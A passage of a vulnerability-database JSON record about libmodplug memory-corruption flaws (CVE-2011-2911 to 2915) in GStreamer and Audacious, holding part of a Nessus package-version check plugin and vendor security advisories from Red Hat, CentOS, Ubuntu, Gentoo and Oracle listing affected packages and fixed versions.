value:\"https://www.redhat.com/security/data/cve/CVE-2011-2912.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-2913.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-2914.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-2915.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2011-1264.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected gstreamer-plugins and / or gstreamer-plugins-devel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gstreamer-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gstreamer-plugins-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2011:1264\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"gstreamer-plugins-0.8.5-1.EL.4\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"gstreamer-plugins-devel-0.8.5-1.EL.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer-plugins / gstreamer-plugins-devel\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:44", "references": ["https://vulners.com/securityvulns/securityvulns:doc:27284"], "description": "Memory corruptions on different media formats.", "edition": 1, "reporter": "BUGTRAQ", "published": "2011-11-11T00:00:00", "title": "libmodplug library multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:44", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "libmodplug", "version": "0.8", "operator": "eq"}], "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-11-11T00:00:00", "id": "SECURITYVULNS:VULN:12028", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12028", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:42", "references": [], "description": "==========================================================================\r\nUbuntu Security Notice USN-1255-1\r\nNovember 09, 2011\r\n\r\nlibmodplug vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.10\r\n- Ubuntu 11.04\r\n- Ubuntu 10.10\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nlibmodplug could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- libmodplug: Library for mod music based on ModPlug\r\n\r\nDetails:\r\n\r\nHossein Lotfi discovered that libmodplug did not correctly handle certain\r\nmalformed media files. If a user or automated system were tricked into\r\nopening a crafted media file, an attacker could cause a denial of service\r\nor possibly execute arbitrary code with privileges of the user invoking the\r\nprogram. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913)\r\n\r\nIt was discovered that libmodplug did not correctly handle certain\r\nmalformed media files. If a user or automated system were tricked into\r\nopening a crafted media file, an attacker could cause a denial of service\r\nor possibly execute arbitrary code with privileges of the user invoking the\r\nprogram. (CVE-2011-2914, CVE-2011-2915)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.10:\r\n libmodplug1 1:0.8.8.2-3ubuntu1.1\r\n\r\nUbuntu 11.04:\r\n libmodplug1 1:0.8.8.1-2ubuntu0.3\r\n\r\nUbuntu 10.10:\r\n libmodplug1 1:0.8.8.1-1ubuntu1.3\r\n\r\nUbuntu 10.04 LTS:\r\n libmodplug0c2 1:0.8.7-1ubuntu0.3\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1255-1\r\n CVE-2011-2911, CVE-2011-2912, CVE-2011-2913, CVE-2011-2914,\r\n CVE-2011-2915\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/libmodplug/1:0.8.8.2-3ubuntu1.1\r\n https://launchpad.net/ubuntu/+source/libmodplug/1:0.8.8.1-2ubuntu0.3\r\n https://launchpad.net/ubuntu/+source/libmodplug/1:0.8.8.1-1ubuntu1.3\r\n https://launchpad.net/ubuntu/+source/libmodplug/1:0.8.7-1ubuntu0.3\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2011-11-11T00:00:00", "title": "[USN-1255-1] libmodplug vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:42", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-11-11T00:00:00", "id": "SECURITYVULNS:DOC:27284", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27284", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:41", "references": ["https://vulners.com/securityvulns/securityvulns:doc:26093"], "description": "ReadS3M buffer overflow. DoS on ABC files parsing.", "edition": 1, "reporter": "BUGTRAQ", "published": "2011-04-11T00:00:00", "title": "libmodplug library buffer overflow", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:41", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "libmodplug", "version": "0.8", "operator": "eq"}], "cvelist": ["CVE-2011-1574", "CVE-2011-1761"], "modified": "2011-04-11T00:00:00", "id": "SECURITYVULNS:VULN:11574", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11574", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2017-09-09T07:20:03", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "x86_64", "packageFilename": "gstreamer-plugins-0.8.5-1.EL.4.x86_64.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "x86_64", "packageFilename": "gstreamer-plugins-devel-0.8.5-1.EL.4.x86_64.rpm", "packageName": "gstreamer-plugins-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "src", "packageFilename": "gstreamer-plugins-0.8.5-1.EL.4.src.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "i386", "packageFilename": "gstreamer-plugins-0.8.5-1.EL.4.i386.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "i386", "packageFilename": "gstreamer-plugins-devel-0.8.5-1.EL.4.i386.rpm", "packageName": "gstreamer-plugins-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "ia64", "packageFilename": "gstreamer-plugins-0.8.5-1.EL.4.ia64.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "ia64", "packageFilename": "gstreamer-plugins-devel-0.8.5-1.EL.4.ia64.rpm", "packageName": "gstreamer-plugins-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "ppc", "packageFilename": "gstreamer-plugins-0.8.5-1.EL.4.ppc.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "ppc", "packageFilename": "gstreamer-plugins-devel-0.8.5-1.EL.4.ppc.rpm", "packageName": "gstreamer-plugins-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "s390", "packageFilename": "gstreamer-plugins-0.8.5-1.EL.4.s390.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "s390", "packageFilename": "gstreamer-plugins-devel-0.8.5-1.EL.4.s390.rpm", "packageName": "gstreamer-plugins-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "s390x", "packageFilename": "gstreamer-plugins-0.8.5-1.EL.4.s390x.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "any", "packageVersion": "0.8.5-1.EL.4", "arch": "s390x", "packageFilename": "gstreamer-plugins-devel-0.8.5-1.EL.4.s390x.rpm", "packageName": "gstreamer-plugins-devel", "operator": "lt"}], "description": "The gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one flaws\nwere found in various ModPlug music file format library (libmodplug)\nmodules, embedded in GStreamer. An attacker could create specially-crafted\nmusic files that, when played by a victim, would cause applications using\nGStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\nCVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues. After\ninstalling the update, all applications using GStreamer (such as Rhythmbox)\nmust be restarted for the changes to take effect.\n", "reporter": "RedHat", "published": "2011-09-06T04:00:00", "type": "redhat", "title": "(RHSA-2011:1264) Important: gstreamer-plugins security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-2911", "CVE-2011-2912", "CVE-2011-2913", "CVE-2011-2914", "CVE-2011-2915"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:18:44", "id": "RHSA-2011:1264", "href": "https://access.redhat.com/errata/RHSA-2011:1264", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-12T14:45:11", "references": ["https://rhn.redhat.com/errata/RHSA-2011-1264.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "0.8.5-1.EL.4", "packageFilename": "gstreamer-plugins-0.8.5-1.EL.4.i386.rpm", "packageName": "gstreamer-plugins", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "0.8.5-1.EL.4", "packageFilename": "gstreamer-plugins-devel-0.8.5-1.EL.4.i386.rpm", "packageName": "gstreamer-plugins-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "0.8.5-1.EL.4", "packageFilename": "gstreamer-plugins-0.8.5-1.EL.4.src.rpm", "packageName": "gstreamer-plugins", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "0.8.5-1.EL.4", "packageFilename": "gstreamer-plugins-0.8.5-1.EL.4.src.rpm", "packageName": "gstreamer-plugins", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "0.8.5-1.EL.4", "packageFilename": "gstreamer-plugins-0.8.5-1.EL.4.x86_64.rpm", "packageName": "gstreamer-plugins", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "0.8.5-1.EL.4", "packageFilename": "gstreamer-plugins-devel-0.8.5-1.EL.4.x86_64.rpm", "packageName": "gstreamer-plugins-devel", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2011:1264\n\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one flaws\nwere found in various ModPlug music file format library (libmodplug)\nmodules, embedded in GStreamer. An attacker could create specially-crafted\nmusic files that, when played by a victim, would cause applications using\nGStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\nCVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues. After\ninstalling the update, all applications using GStreamer (such as Rhythmbox)\nmust be restarted for the changes to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-September/017719.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-September/017720.html\n\n**Affected packages:**\ngstreamer-plugins\ngstreamer-plugins-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-1264.html", "edition": 2, "reporter": "CentOS Project", "published": "2011-09-08T13:33:02", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "gstreamer security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-09-08T13:33:42", "href": "http://lists.centos.org/pipermail/centos-announce/2011-September/017719.html", "id": "CESA-2011:1264", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:27", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2011-2912", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-2913", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-2914", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-2911", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-2915"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "1:0.8.7-1ubuntu0.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libmodplug0c2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "1:0.8.8.1-2ubuntu0.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libmodplug1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "1:0.8.8.1-1ubuntu1.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libmodplug1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "11.10", "packageVersion": "1:0.8.8.2-3ubuntu1.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libmodplug1", "operator": "lt"}], "description": "Hossein Lotfi discovered that libmodplug did not correctly handle certain malformed media files. If a user or automated system were tricked into opening a crafted media file, an attacker could cause a denial of service or possibly execute arbitrary code with privileges of the user invoking the program. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913)\n\nIt was discovered that libmodplug did not correctly handle certain malformed media files. If a user or automated system were tricked into opening a crafted media file, an attacker could cause a denial of service or possibly execute arbitrary code with privileges of the user invoking the program. (CVE-2011-2914, CVE-2011-2915)", "edition": 3, "reporter": "Ubuntu", "published": "2011-11-09T00:00:00", "title": "libmodplug vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-11-09T00:00:00", "id": "USN-1255-1", "href": "https://usn.ubuntu.com/1255-1/", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:09:33", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2011-1761", "https://people.canonical.com/~ubuntu-security/cve/CVE-2011-1574"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "11.04", "packageVersion": "1:0.8.8.1-2ubuntu0.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libmodplug1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "1:0.8.7-1ubuntu0.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libmodplug0c2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "1:0.8.8.1-1ubuntu1.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libmodplug1", "operator": "lt"}], "description": "It was discovered that libmodplug did not correctly handle certain malformed S3M media files. If a user or automated system were tricked into opening a crafted S3M file, an attacker could cause a denial of service or possibly execute arbitrary code with privileges of the user invoking the program. (CVE-2011-1574)\n\nIt was discovered that libmodplug did not correctly handle certain malformed ABC media files. If a user or automated system were tricked into opening a crafted ABC file, an attacker could cause a denial of service or possibly execute arbitrary code with privileges of the user invoking the program. (CVE-2011-1761)\n\nThe default compiler options for affected releases should reduce the vulnerability to a denial of service.", "edition": 3, "reporter": "Ubuntu", "published": "2011-06-13T00:00:00", "title": "libmodplug vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574", "CVE-2011-1761"], "modified": "2011-06-13T00:00:00", "id": "USN-1148-1", "href": "https://usn.ubuntu.com/1148-1/", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:18", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2912", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2911", "https://bugs.gentoo.org/show_bug.cgi?id=383991", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2914", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2913", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2915"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "3.1", "packageName": "media-plugins/audacious-plugins", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nPlugins for the Audacious music player.\n\n### Description\n\nMultiple vulnerabilities have been found in Audacious Plugins:\n\n * The \"CSoundFile::ReadWav()\" function in load_wav.cpp contains an integer overflow which could cause a heap-based buffer overflow (CVE-2011-2911). \n * The \"CSoundFile::ReadS3M()\" function in load_s3m.cpp contains multiple boundary errors which could cause a stack-based buffer overflow (CVE-2011-2912). \n * The \"CSoundFile::ReadAMS()\" function in load_ams.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2913). \n * The \"CSoundFile::ReadDSM()\" function in load_dms.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2914). \n * The \"CSoundFile::ReadAMS2()\" function in load_ams.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2915). \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted media file, possibly resulting in execution of arbitrary code, or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Audacious Plugins users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=media-plugins/audacious-plugins-3.1\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2012-03-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "gentoo", "title": "Audacious Plugins: User-assisted execution of arbitrary code", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2012-03-16T00:00:00", "id": "GLSA-201203-14", "href": "https://security.gentoo.org/glsa/201203-14", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-06T19:46:01", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2912", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2911", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1574", "https://bugs.gentoo.org/show_bug.cgi?id=379557", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2914", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2913", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2915", "https://bugs.gentoo.org/show_bug.cgi?id=362503"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "0.8.8.4", "packageName": "media-libs/libmodplug", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nModPlug is a library for playing MOD-like music.\n\n### Description\n\nMultiple vulnerabilities have been found in ModPlug:\n\n * The ReadS3M method in load_s3m.cpp fails to validate user-supplied information, which could cause a stack-based buffer overflow (CVE-2011-1574). \n * The \"CSoundFile::ReadWav()\" function in load_wav.cpp contains an integer overflow which could cause a heap-based buffer overflow (CVE-2011-2911). \n * The \"CSoundFile::ReadS3M()\" function in load_s3m.cpp contains multiple boundary errors which could cause a stack-based buffer overflow (CVE-2011-2912). \n * The \"CSoundFile::ReadAMS()\" function in load_ams.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2913). \n * The \"CSoundFile::ReadDSM()\" function in load_dms.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2914). \n * The \"CSoundFile::ReadAMS2()\" function in load_ams.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2915). \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted media file, possibly resulting in execution of arbitrary code, or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll ModPlug users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/libmodplug-0.8.8.4\"\n \n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are available since August 27, 2011. It is likely that your system is already no longer affected by this issue.", "edition": 1, "reporter": "Gentoo Foundation", "published": "2012-03-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "gentoo", "title": "ModPlug: User-assisted execution of arbitrary code", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1574", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2012-03-16T00:00:00", "id": "GLSA-201203-16", "href": "https://security.gentoo.org/glsa/201203-16", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:48:56", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.8.5-1.0.1.EL.4", "arch": "i386", "packageFilename": "gstreamer-plugins-0.8.5-1.0.1.EL.4.i386.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.8.5-1.0.1.EL.4", "arch": "ia64", "packageFilename": "gstreamer-plugins-devel-0.8.5-1.0.1.EL.4.ia64.rpm", "packageName": "gstreamer-plugins-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.8.5-1.0.1.EL.4", "arch": "i386", "packageFilename": "gstreamer-plugins-devel-0.8.5-1.0.1.EL.4.i386.rpm", "packageName": "gstreamer-plugins-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.8.5-1.0.1.EL.4", "arch": "src", "packageFilename": "gstreamer-plugins-0.8.5-1.0.1.EL.4.src.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.8.5-1.0.1.EL.4", "arch": "src", "packageFilename": "gstreamer-plugins-0.8.5-1.0.1.EL.4.src.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.8.5-1.0.1.EL.4", "arch": "src", "packageFilename": "gstreamer-plugins-0.8.5-1.0.1.EL.4.src.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.8.5-1.0.1.EL.4", "arch": "x86_64", "packageFilename": "gstreamer-plugins-0.8.5-1.0.1.EL.4.x86_64.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.8.5-1.0.1.EL.4", "arch": "ia64", "packageFilename": "gstreamer-plugins-0.8.5-1.0.1.EL.4.ia64.rpm", "packageName": "gstreamer-plugins", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "0.8.5-1.0.1.EL.4", "arch": "x86_64", "packageFilename": "gstreamer-plugins-devel-0.8.5-1.0.1.EL.4.x86_64.rpm", "packageName": "gstreamer-plugins-devel", "operator": "lt"}], "description": "[0.8.5-1.0.1.EL.4]\n- Update release to address ULN up2date\n[0.8.5-1.EL.4]\n- Add patches for CVE-2011-2911, CVE-2011-2912, CVE-2011-2913, CVE-2011-2914\n and CVE-2011-2915\nRelated: rhbz #730997", "edition": 3, "reporter": "Oracle", "published": "2011-09-07T00:00:00", "title": "gstreamer-plugins security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2011-09-07T00:00:00", "id": "ELSA-2011-1264", "href": "http://linux.oracle.com/errata/ELSA-2011-1264.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2017-08-29T11:19:36", "references": ["http://sourceforge.net/projects/modplug-xmms/files/libmodplug/0.8.8.4/", "http://www.openwall.com/lists/oss-security/2011/08/10/4", 